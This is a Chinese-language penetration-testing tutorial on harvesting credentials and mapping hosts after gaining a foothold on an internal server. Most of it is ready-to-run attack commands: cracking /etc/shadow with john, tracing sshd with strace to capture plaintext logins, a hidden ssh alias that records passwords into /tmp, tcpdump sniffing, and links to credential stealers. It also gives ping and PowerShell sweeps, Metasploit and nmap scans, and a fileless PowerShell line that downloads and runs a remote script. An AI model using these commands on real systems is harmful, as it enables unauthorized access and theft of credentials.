内网服务器如何进行信息收集

密码域密文由三部分组成，即：idsalt$encrypted。当id=1，采用md5进行加密，弱口令容易被破解。

当id为5时，采用SHA256进行加密，id为6时，采用SHA512进行加密，可以通过john进行暴力破解。

wget https://www.openwall.com/john/k/john-1.9.0.tar.gz tar -zxvf john-1.9.0.tar.gz make clean linux-x86-64  ./john /etc/shadow

03、mimipenguin抓取密码

一款Linux下的密码抓取神器，需要root权限运行，通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证，目前支持Kali、Ubnutu等操作系统。

https://github.com/huntergregal/mimipenguin

04、使用Strace收集登录凭证

strace是一个动态跟踪工具，堪比键盘记录器的存在，可用来收集登录凭证。

（1）获取sshd进程明文密码

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

使用正在来匹配用户和密码

# 查找用户名和密码 grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log # 结果形式如下 [pid  2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9 [pid  2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27 [pid  2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9

（2）收集ssh登陆凭证

# 添加命令别名 vi ~/.bashrc或者/etc/bashrc alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh' # 使命令别名立即生效 source ~/.bashrc

通过grep 找到匹配行的后8行，可以根据密码长度调整行数

grep -A 9 'password' .ssh-25Sep091601017212.log

05、tcpdump 抓包分析

抓取数据包进行分析，获取明文账号密码，比如ftp、telnet、http。

tcpdump -i ens33 port 23 -w test.cap

06、全盘搜索敏感信息

全局搜索配置文件、脚本、数据库、日志文件是否有包含密码。

grep -rn "password=" /

07、swap_digger

一个用于自动进行Linux交换分析bash脚本，自动进行交换提取，并搜索Linux用户凭据，Web表单凭据，Web表单电子邮件，HTTP基本身份验证，WiFi SSID和密钥等。

github项目收集：

https://github.com/sevagas/swap_digger

08、Impost3r

一个利用C语言编写,用来窃取linux下各类密码(ssh,su,sudo)的工具。

github项目收集：

https://github.com/ph4ntonn/Impost3r

存活主机探测

在渗透中，当我们拿下一台服务器作为跳板机进一步进行内网渗透时，往往需要通过主机存活探测和端口扫描来收集内网资产。

我们将主机扫描的场景大致可分为三种，1）直接在webshell下执行，通过系统自带命令或上传脚本工具进行扫描探测 ；2）通过反弹shell进行内网渗透，msf等渗透测试框架自带一些扫描模块；3）通过socks代理扫描内网（例如 proxychains+Nmap扫描）。

在合适的场景下，选择最合适的武器。比如支持存活探测的协议，包括了 ARP、ICMP、SMB、 UDP、NETBIOS、SNMP协议等；支持端口扫描的方式，包括ACK扫描、SYN扫描、TCP扫描、UDP扫描、ICMP扫描等。

01.ping

我们经常通过ping检查网络连通性，通过telnet来测试指定端口连通性。使用系统自带的命令来完成C段探测，虽然效率低，但不容易触发安全规则。如果服务器开启了防火墙或者禁ping，那么就会影响探测结果。

Windows下使用ping命令扫描C段：

for /l %i in (1,1,255) do @ping 192.168.64.%i -w 1 -n 1|find /i "ttl=" 

Linux 下使用ping命令扫描C段：

for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done 

另外，还可以结合系统自带的traceroute、arp 、netstat等命令收集内网信息，curl、wget可以用来做端口探测。

2.Powershell

通过powershell脚本扫描IP地址存活：

powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.1.255" 

脚本下载地址：https://gallery.technet.microsoft.com/scriptcenter/Invoke-TSPingSweep-b71f1b9b

用PowerShell实现基本的端口扫描功能。

针对单个IP的多个端口的扫描：

PS C:\Users\Bypass> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.246.44",$_)) "Port $_ is open!"} 2>$null 

针对某IP段中单个端口的扫描：

foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip} 

针对某IP段 & 多个端口的扫描器

1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null} 

3.基于MSF的内网主机探测

使用msf进行反弹shell进行内网渗透时，通过msf自带的扫描模块进行快速扫描。

主机存活探测：

auxiliary/scanner/discovery/arp_sweep   ARP扫描 auxiliary/scanner/discovery/udp_sweep   UDP扫描 auxiliary/scanner/netbios/nbname        NETBIOS扫描 auxiliary/scanner/snmp/snmp_enum        SNMP扫描 auxiliary/scanner/smb/smb_version       SMB扫描 

端口扫描：

auxiliary/scanner/portscan/ack          TCP ACK端口扫描 auxiliary/scanner/portscan/ftpbounce    FTP bounce端口扫描  auxiliary/scanner/portscan/syn         SYN端口扫描 auxiliary/scanner/portscan/tcp          TCP端口扫描   auxiliary/scanner/portscan/xmas         TCP XMas端口扫描 

04、Nmap

Nmap是一个端口扫描器，可用于主机发现、端口扫描、版本检测、OS检测等。

使用场景：建立socks代理，proxychains+Nmap扫描内网。

支持多种扫描模式：

-sT: TCP 扫描 -sS: SYN 扫描 -sA: ACK 扫描 -sF：FIN扫描 -sU: UDP 扫描 -sR: RPC 扫描 -sP: ICMP扫描 

快速扫描所有端口：

nmap -sS -p 1-65535 -v 192.168.99.177

内网端口扫描

1、利用telnet进行端口扫描

快速探测主机是否存在常见的高危端口

telnet 192.168.0.2 22 telnet 192.168.0.2 3306

2、Metasploit端口扫描

Metasploit渗透测试利器，提供了很多漏洞利用、扫描功能。

auxiliary/scanner/portscan/ack ACK防火墙扫描
auxiliary/scanner/portscan/ftpbounce FTP跳端口扫描
auxiliary/scanner/portscan/syn SYN端口扫描
auxiliary/scanner/portscan/tcp TCP端口扫描

使用auxiliary/scanner/portscan/tcp模块示例

use auxiliary/scanner/portscan/tcp
show options

3、PowerSploit的Invoke-portscan.ps1

无文件形式扫描：

powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports ‘445,1433,80,8080,3389’ -oA c:\ProgramData\ip_info”

4、Nishang的Invoke-PortScan模块

获取帮助

Get-Help Invoke-PortScan -full

StartAddress 扫描范围开始地址

EndAddress 扫描范围结束地址

ScanPort 进行端口扫描

Port 指定扫描端口，不指定port，则默认端口为 21,22,23,53,69,71,80,98,110,139,111, 389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389, 5801,5900,5555,5901

TimeOut 设置超时时间

-ResolveHost 解析主机名

扫描存活主机及端口并解析主机名

使用方式

Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort

5、Nmap

https://www.cnblogs.com/iAmSoScArEd/p/10585863.html

6、端口利用

具体信息及利用速查 ：https://www.cnblogs.com/iAmSoScArEd/p/10564262.html

根据banner信息，可以在CVE库对指定服务、版本进行漏洞查询

或使用Exploit-DB查询PoC、EXP